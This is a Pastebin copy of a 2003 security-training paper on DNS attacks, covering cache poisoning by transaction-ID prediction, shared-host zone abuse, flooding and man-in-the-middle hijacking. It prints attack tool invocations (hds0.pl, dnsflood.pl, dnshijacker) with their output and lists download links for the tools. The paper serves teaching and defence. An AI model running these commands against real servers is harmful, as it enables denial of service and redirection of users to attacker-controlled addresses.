API tools faq
paste
Advertisement
xdxdxd123

Untitled

xdxdxd123
May 24th, 2017
232
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.65 KB | None | 0 0
raw download clone embed print report
  1. Expert Security Associate (ESA) Certification
  2. Sainstitute.org
  3. Attacking the DNS Protocol – Security Paper v2
  4. Wednesday, 29 October 2003
  5. • Typical DNS Attacks
  6. • Cache Poisoning using DNS
  7. Transaction ID Prediction
  8. • Example of a Cache Poisoning Attack
  9. on a DNS Server
  10. • Example of a Cache Poisoning Attack
  11. on a DNS Server
  12. • DNS Vulnerabilities in Shared Host
  13. Environments
  14. • Example DNS Flooding – Creating a
  15. DNS Denial of Service Attack
  16. • DNS Man in the Middle Attacks
  17. DNS Hijacking
  18. Security Associates Institute. All Rights Reserved
  19. Permission is granted to freely copy, distribute and/or modify this document
  20. Paper Overview
  21. DNS is a heavily used protocol on the
  22. Internet yet has numerous security
  23. considerations.
  24. This paper whilst containing nothing new
  25. on DNS security brings together in one
  26. document many strands of DNS security
  27. which has been published and reported in
  28. many separate publications before. As such
  29. this document intends to act as a single
  30. point of reference for DNS security.
  31. This paper contains some basic and
  32. advanced level attacks.
  33. DNS Security – Security Associates Institute
  34. Page 2 of 11
  35. Attacking the DNS Protocol
  36. DNS stands for Domain Name System and it is used to resolve domain names to IP
  37. addresses and vice versa. A DNS server will listen on UDP port 53 for name resolution
  38. queries and TCP port 53 for zone transfers which are conducted most typically by
  39. other DNS servers. Estimates put DNS as occupying almost 20% of all Internet
  40. traffic.
  41. The Berkley Internet Name Service (BIND) is the most common form of DNS server
  42. used on the Internet. BIND typically runs on UNIX type systems. The DNS server
  43. stores information which it serves out about a particular domain (also referred to as a
  44. namespace) in text files called zone files.
  45. A DNS client runs a service called a resolver. The resolver handles all interaction with
  46. the DNS server in order to resolve names to IP addresses using what are called
  47. records. There are many types of records, but the most common are A, CNAME and
  48. MX records.
  49. A client (the resolver) maintains a small amount of local cache which it will refer to
  50. first before looking at a local static host’s file and then finally the DNS server. The
  51. result returned will then be cached by the client for a small period of time.
  52. When a DNS server is contacted for a resolution query, and if it is authoritative (has
  53. the answer to the question in its own database) for a particular domain (referred to
  54. as a zone) it will return the answer to the client. If it is not authoritative for the
  55. domain, the DNS server will contact other name servers and eventually it will get the
  56. answer it needs which is passed back to the client. This process is known as
  57. recursion.
  58. Additionally the client itself can attempt to contact additional DNS servers to resolve a
  59. name. When a client does so, it uses separate and additional queries based on
  60. referral answers from servers. This process is known as iteration. Generally recursion
  61. is the most common form of resolution used.
  62. Typical DNS Attacks
  63. DNS servers have been attacked and compromised using a number of techniques.
  64. Examples include:
  65. • Buffer overflow attacks to gain command level access on the DNS server or
  66. to modify zone files.
  67. • Information Disclosure attacks such as zone transfers and obtaining version
  68. information.
  69. • Cache poisoning attacks whereby the cache of the DNS is deliberately
  70. contaminated by an attacker. This is done using DNS Transaction ID
  71. predication or Recursive queries.
  72. Buffer overflow attacks follow the typical network infrastructure mapping and
  73. research steps followed by execution of an exploit as outlined previously. Similarly
  74. information disclosure attacks have been discussed in the same network
  75. infrastructure mapping and research sections.
  76. DNS Security – Security Associates Institute
  77. Page 3 of 11
  78. The advanced and skilled technique of cache poisoning will be discussed next. The
  79. assumption is the target DNS server is a BIND server as the majority of DNS servers
  80. on the Internet are BIND.
  81. Cache Poisoning using DNS Transaction ID Prediction
  82. When a client in the domain sa.com makes a request to resolve www.microsoft.com
  83. the below sequence events will typically occur.
  84. 1. The client will contact its configured DNS server and ask for
  85. www.microsoft.com to be resolved. This query will contain information about
  86. the client’s source UDP port, IP address and a DNS transaction ID.
  87. 2. The client’s DNS server since it is not authoritative for the microsoft.com
  88. domain will through recursive queries via the Internet root DNS servers
  89. contact the Microsoft DNS server and get an answer for the query.
  90. 3. This successful query will then be passed back to the client and this
  91. information is cached by both the sa.com name server and the client.
  92. DNS Name Resolution Request
  93. The important things to note here are:
  94. • In step 3 the client will only accept the information returned if the DNS
  95. server uses the clients correct source port and address in addition to the
  96. correct DNS transaction ID as noted in step 1. These three pieces of
  97. information are the only form of authentication used to accept DNS replies.
  98. • The returned www.microsoft.com information is cached by both the client
  99. and the server for a specified TTL (time to live) period. If another client was
  100. to ask ns1.sa.com to resolve www.microsoft.com during this TTL the name
  101. server will return the information from its cache and not ask
  102. ns1.microsoft.com
  103. A distinction needs to be made to the transaction ID as used between the client and
  104. the name server and the transaction ID as used between name server to name
  105. server. These are in fact two different transaction ID’s as in essence they are two
  106. different requests.
  107. DNS Security – Security Associates Institute
  108. Page 4 of 11
  109. The above steps can be abused by an attacker to place false information in
  110. ns1.sa.com’s cache. In the below illustration the attacker attempts to correctly guess
  111. the transaction ID used during the name server to name server communication
  112. stage.
  113. To achieve this an attacker would:
  114. 1. Send a large number of resolution requests each spoofed with different
  115. source IP information for www.microsoft.com to ns1.sa.com. The logic of
  116. sending many requests is that each request will be assigned a unique
  117. transaction ID and even though all requests are for the same domain name,
  118. each will be processed independently.
  119. 2. The ns1.sa.com will send each of these requests to the other DNS servers
  120. and eventually ns1.microsoft.com as highlighted at the top of this section.
  121. Hence the ns1.sa.com server is awaiting a large number of replies from
  122. ns1.microsoft.com.
  123. 3. The attacker uses this wait stage to bombard ns1.sa.com with spoofed
  124. replies from ns1.microsoft.com stating that www.microsoft.com points to an
  125. IP address which is under the attacker’s control i.e. false information. Each
  126. spoofed reply has a different transaction ID. The attacker hopes to guess
  127. the correct transaction ID as used the two name servers.
  128. DNS Poison Attack
  129. If the attacker is successful the false information will be stored in ns1.sa.com’s cache.
  130. Note this is very much a name server to name server attack which will affect clients
  131. who use the target name server with false information.
  132. BIND transactional ID’s are in the range of 1-65535.
  133. DNS Security – Security Associates Institute
  134. Page 5 of 11
  135. Recall how three pieces of information are required for the query to be accepted,
  136. notably the transaction ID, the source IP and the source port. Knowing the source IP
  137. is straight forward as we know the address of the name server to be queried. The
  138. source port however presents a challenge.
  139. More often than not BIND will reuse the same source port for queries on behalf of
  140. the same client i.e. the BIND name server. Hence, if an attacker is working from an
  141. authoritative name server, he can first issue a request for a DNS lookup of a
  142. hostname on his server from the target server and when the recursive query packet
  143. arrives the source port can be obtained.
  144. It is likely this will be the same source port used when the victim sends the queries
  145. for the domain to be hijacked. Examine the below sniffed output of three subsequent
  146. queries for different domain names:
  147. 172.16.1.2.22343 > 128.1.4.100.53
  148. 172.16.1.2.22343 > 23.55.3.56.53
  149. 172.16.1.2.22343 > 42.14.212.5.53
  150. All three queries used source port 22343 while querying four different name servers.
  151. This is illustrated in the below diagram.
  152. DNS Poison Attack
  153. BIND versions 4 and 8 use sequential transaction ID’s. This means an attacker can
  154. easily find the current ID simply by making a query to the server and observing the
  155. ID number and be in the knowledge that the next query BIND will make to say
  156. another name server will be simply +1 of this value.
  157. BIND version 9 assigns transaction ID’s on a random basis and does not send
  158. multiple recursive queries for the same domain name.
  159. Example of a Cache Poisoning Attack on a DNS Server
  160. We will examine two scripts which have been released which provide a
  161. demonstration of a cache poisoning attack.
  162. Assume our target name server is ns1.sa.com (12.12.12.12) and we wish to poison
  163. its cache to believe www.microsoft.com resolves to 10.10.10.10 in the hope that all
  164. future queries it will receive for the TTL this information is in the cache will be
  165. DNS Security – Security Associates Institute
  166. Page 6 of 11
  167. directed to this 10.10.10.10. address. We know microsoft.com’s DNS server is
  168. ns1.microsoft.com (13.13.13.13).
  169. The first of the scripts is called dns1.pl 1 and was released as a proof of concept but
  170. is modified in our example to obtain the source port of the DNS server. It needs to be
  171. run from an authoritative name server which the attacker controls to query the target
  172. name server for a hostname for which the attacker’s machine is authoritative.
  173. Say in our example the script is running from ns1.happydays.com and the attacker
  174. queries the target name server for www.happydays.com:
  175. dns1.pl 12.12.12.12 www.happydays.com
  176. source port: 54532
  177. Having obtained the source port we run the second script written by Ramon Izaguirre
  178. called hds0.pl 2 (this script requires the RAW IP Perl Module) which actually executes
  179. the attack.
  180. ./hds0.pl 13.13.13.13 12.12.12.12 54532 www.microsoft.com 10.10.10.10
  181. (ns1.microsoft.com) (ns1.sa.com) (source port) (spoof targets)
  182. To observe if the attack was successful simply query the target name server:
  183. dig @12.12.12.12 www.microsoft.com
  184. www.microsoft.com 86400 IN A 10.10.10.10
  185. In the above case www.microsoft.com resolves to 10.10.10.10, hence the attack has
  186. been successful. Note that if the attack was unsuccessful and the correct IP address
  187. for www.microsoft.com was obtained that you will have to wait for the duration of
  188. the TTL to expire in the cache before you can try again. Additionally it is likely the
  189. domain microsoft.com has more than one DNS server, it is highly likely that it also
  190. has an ns2.microsoft.com server. The attacker does not know which of the
  191. authoritative DNS servers of the target domain will get queried.
  192. DNS Vulnerabilities in Shared Host Environments
  193. A shared host environment is where one DNS server is shared amongst many users
  194. and domains. Domain parking and free DNS services facilities provide this feature
  195. whereby a user can add a domain name they have just registered.
  196. This vulnerability is not with any specific DNS server but rather an abuse of the open
  197. trust relationship of the Internet DNS system. As such this is very much a
  198. architecture flaw than a vulnerability.
  199. Say an attacker using a shared DNS server creates a zone file for the microsoft.com
  200. domain and adds relevant A and MX records. Now any user who has the said DNS
  201. server configured as primary from a client will when attempting to go to
  202. microsoft.com be directed to the records as configured by the client i.e. potentially
  203. false information.
  204. DNS Security – Security Associates Institute
  205. Page 7 of 11
  206. This is because as far the DNS server is concerned it is authoritative for the
  207. microsoft.com domain and therefore does not need to query the Internet root servers
  208. and .com name servers to find the IP address of the primary Microsoft name server
  209. as it already has the required information in its zone files. Potentially if the attacker
  210. configures MX records all mail destined for the victim and which has the victims MX
  211. records queried by the abused name server could be redirected to the attacker.
  212. This attack is illustrated in the below diagram:
  213. DNS Shared Host Vulnerability
  214. Note step 3 whereby the DNS server since it has the information in its zone file does
  215. not send further recursive queries. If this information had not been present in its
  216. zone files, then the DNS server would have first contacted the Internet root servers
  217. and then the .com name servers before asking the question asked to it by the client
  218. to the given microsoft.com name server.
  219. Example DNS Flooding – Creating a DNS Denial of Service Attack
  220. DNS servers like other Internet resources are prone to denial of service attacks. Since
  221. DNS uses UDP queries for name resolution, meaning a full circuit is never established
  222. (as contrasted with TCP) denial of service attacks are almost impossible to trace and
  223. block as they are highly spoofable.
  224. To create a denial of service on a DNS server a script such as dnsflood.pl 3 can be
  225. used simultaneously from multiple machines to starve the server of resources.
  226. DNSflood works by sending many thousands of rapid DNS requests, thereby giving
  227. the server more traffic than it can handle resulting in slower and slower response
  228. times for legitimate requests.
  229. In the below example dnsflood is run from one machine and the DNS server queried
  230. from another machine.
  231. First the attacker runs the script:
  232. [root@fanta dns]# perl dnsflood.pl 128.1.1.100
  233. attacked: 128.1.1.100...
  234. Notice from the below tcpdump sniffed output from the attacking machine the
  235. different types of DNS packets sent, each with a different spoofed source port.
  236. DNS Security – Security Associates Institute
  237. Page 8 of 11
  238. [root@fanta /root]# tcpdump -vvv -X dst port 53
  239. tcpdump: listening on eth0
  240. 18:55:53.618983 42.95.39.205.domain > 128.1.1.100.domain: 35698+[|domain] (ttl 64,
  241. id 1565, len 108)
  242. 0x0000 4500 006c 061d 0000 4011 a0d3 2a5f 27cd E..l....@...*_'.
  243. 0x0010 8001 0164 0035 0035 0058 f00f 8b72 0100 ...d.5.5.X...r..
  244. 0x0020 0001 0000 0000 0000 3a63 6b6c 7266 6969 ........:cklrfii
  245. 0x0030 7363 6d61 7362 scmasb
  246. 18:55:53.621071 95.10.15.152.domain > 128.1.1.100.domain: 35699+[|domain] (ttl 64,
  247. id 1565, len 109)
  248. 0x0000 4500 006d 061d 0000 4011 845c 5f0a 0f98 E..m....@..\_...
  249. 0x0010 8001 0164 0035 0035 0059 3fbf 8b73 0100 ...d.5.5.Y?..s..
  250. 0x0020 0001 0000 0000 0000 3b63 6b6c 7266 6969 ........;cklrfii
  251. 0x0030 7363 6d61 7362 scmasb
  252. To assess the impact of this attack on performance the attacker from another
  253. machine first clears his local cache and then queries the target name server. Clearing
  254. the local cache will ensure the resolver gets the information from the server and not
  255. locally.
  256. D:\>ipconfig /flushdns
  257. Windows IP Configuration
  258. Successfully flushed the DNS Resolver Cache.
  259. D:\>nslookup
  260. DNS request timed out.
  261. timeout was 2 seconds.
  262. *** Can't find server name for address 128.1.1.100: Timed out
  263. *** Default servers are not available
  264. Default Server: UnKnown
  265. Address: 128.1.1.100
  266. > ms2.sa.com
  267. Server: UnKnown
  268. Address: 128.1.1.100
  269. DNS request timed out.
  270. timeout was 2 seconds.
  271. DNS request timed out.
  272. timeout was 2 seconds.
  273. *** Request to UnKnown timed-out
  274. > ms3.sa.com
  275. Server: UnKnown
  276. Address: 128.1.1.100
  277. DNS request timed out.
  278. timeout was 2 seconds.
  279. Name: ms3.sa.com
  280. Address: 128.1.47.1
  281. > exit
  282. The attacker then stops the attack and then once again from another machine
  283. queries the target name server after once again clearing the cache.
  284. D:\>ipconfig /flushdns
  285. Windows IP Configuration
  286. Successfully flushed the DNS Resolver Cache.
  287. DNS Security – Security Associates Institute
  288. Page 9 of 11
  289. D:\>nslookup
  290. Default Server: ns1.sa.com
  291. Address: 128.1.1.100
  292. > ms2.rhs.net
  293. Server: ns1.sa.com
  294. Address: 128.1.1.100
  295. Name: ms2.sa.com
  296. Address: 128.1.23.8
  297. > exit
  298. Notice the distinction between the queries conducted during the attack and after the
  299. attack was stopped. It seems evident the attack had a performance impact on the
  300. server. If this attack was multiplied from a number of machines then the impact
  301. would be even greater.
  302. DNS Man in the Middle Attacks – DNS Hijacking
  303. If an attacker is able to insert himself between the client and the DNS server he may
  304. be able to intercept replies to client name resolution queries and send false
  305. information mapping addresses to incorrect addresses. This type of attack is very
  306. much a race condition, in that the attacker needs to get his reply back to the client
  307. before the legitimate server does. The odds may be stacked in the favour of the
  308. client as a number of recursive queries may need to be made and the attacker may
  309. be able to slow the client’s primary DNS server down by using a denial of service
  310. attack.
  311. This attack is illustrated in the below diagram:
  312. Figure 5.8 – DNS Man in the Middle Attack
  313. DNS Security – Security Associates Institute
  314. Page 10 of 11
  315. The diagram above shows:
  316. 1. The attacker places himself between the client and name server
  317. 2. The client makes a DNS request for resolution of www.microsoft.com
  318. 3. This request is intercepted by the attacker who replies with false information
  319. 4. The DNS server replies with the correct information
  320. Once again this is a race condition, the winner will be the first packet which hits the
  321. client.
  322. To execute this attack a tool called DNS Hijacker 4 is used and run on the attackers
  323. man in the middle machine. DNS Hijacker uses a fabrication table to store the
  324. falsified information to be returned. The below table shows the hostname
  325. ms2.sa.com configured to reply with a address of 10.10.10.10. The actual address for
  326. ms2.sa.com as configured by the DNS administrator is 128.1.23.8.
  327. [root@fanta dnshijacker]# more ftable
  328. 10.10.10.10 ms2.sa.com
  329. Next the attacker starts the DNS Hijacker program as shown below:
  330. [root@fanta dnshijacker]# dnshijacker -f ftable udp src or dst port 53
  331. [dns hijacker v1.2 ]
  332. sniffing on: eth0
  333. using filter: udp dst port 53 and udp src or dst port 53
  334. fabrication table: ftable
  335. dns activity: 128.1.4.232:1027 > 128.1.1.100:53 [ms2.sa.com = ?]
  336. spoofing answer: 128.1.1.100:53 > 128.1.4.232:1027 [ms2.sa.com =
  337. 10.10.10.10]
  338. Notice the first request asking for resolution of ms2.sa.com and the spoofed answer
  339. returned by the attacker of 10.10.10.10. Below from the client side this information is
  340. accepted:
  341. [root@fanta init.d]# nslookup
  342. Default Server: [128.1.1.100]
  343. Address: 128.1.1.100
  344. > ms2.sa.com
  345. Server: [128.1.1.100]
  346. Address: 128.1.1.100
  347. Name: ms2.sa.com
  348. Address: 10.10.10.10
  349. The incorrect information is returned to the client and accepted as valid. DNS hijacker
  350. has a –d option with which all DNS requests intercepted will be returned false
  351. information.
  352. DNS Security – Security Associates Institute
  353. Page 11 of 11
  354. Document References and Credits
  355. [1] - http://www.rnp.br/cais/alertas/2002/cais-ALR-
  356. 19112002a.html
  357. [2] - http://www.securityfocus.com/guest/17905
  358. Tools Used
  359. The below tools were used in this document and can be downloaded from the
  360. Security Associates Institute’s website. These are Open Source tools not written by
  361. the Institute and are provided for download “as is” and full respect provided to the
  362. authors of these tools. Read the README file of each distribution or the source code
  363. for authors information.
  364. Dns1.pl 1 – http://www.sainstitute.org/articles/tools/Dns1.pl
  365. Hds0.pl 2 – http://www.sainstitute.org/articles/tools/Hds0.pl
  366. Dnsflood.pl 3 – http://www.sainstitute.org/articles/tools/Dnsflood.pl
  367. DNS Hijacker 4 – http://www.sainstitute.org/articles/tools/DNS Hijacker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!